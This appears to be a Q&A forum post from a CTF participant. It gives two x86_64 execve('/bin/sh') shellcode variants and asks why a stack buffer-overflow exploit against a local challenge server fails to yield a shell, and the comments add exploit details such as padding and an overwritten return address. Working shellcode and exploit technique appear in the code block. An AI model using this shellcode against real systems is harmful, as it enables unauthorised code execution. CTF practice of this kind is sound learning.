# Shell execution buffer overflow server directly hosted

Tags: gdb, buffer-overflow, ctf, pwntools

I usually use a different method to push /bin/sh in rdi to get a shell , but I wanted to try this one : Put in case that i can control the RIP and there are no limitation or filters.So I can execute the assembly code as I want.

```
mov rax, 0x0068732f6e69622f
push rax
push rsp
pop rdi
mov rax ,0x3b
xor rsi, rsi
xor rdx, rdx
syscall

lea rdi, [rip + shell]
mov rax, 0x3b
xor rsi, rsi
xor rdx, rdx
syscall

shell:
  .string "/bin/sh"
```

While I usually use the above one , I don't get why the first one isn't working. I also used GDB to verify and everything seems to be good and in the right positions.In addition to that i also get in dgb : process 8870 is executing new program: /usr/bin/dash.

Why it doesn't work?

So that's what I tried to do , but i don't get why it doesn't work.Actually in the current CTF neither of them works even if as I said in gdb everything seems right

Comment: Paraphrasing: "I did _something_ and it didn't work even though everything is correct." You'll need to provide a lot more details if you want a useful answer.

Comment: @EmployedRussian sorry for the lack of info: No PIE,NX unknow, stack executable.The arch is x86_64.The challenge consists in a server that I’m running and debugging anda the payload i send its made of : N bytes A for padding and the actual address to which the RIP should point that is the one that contains this code.I haven’t used a rop gadget but I manually send the address of the RSP.

Comment: @EmployedRussian and I have no stdin or stdout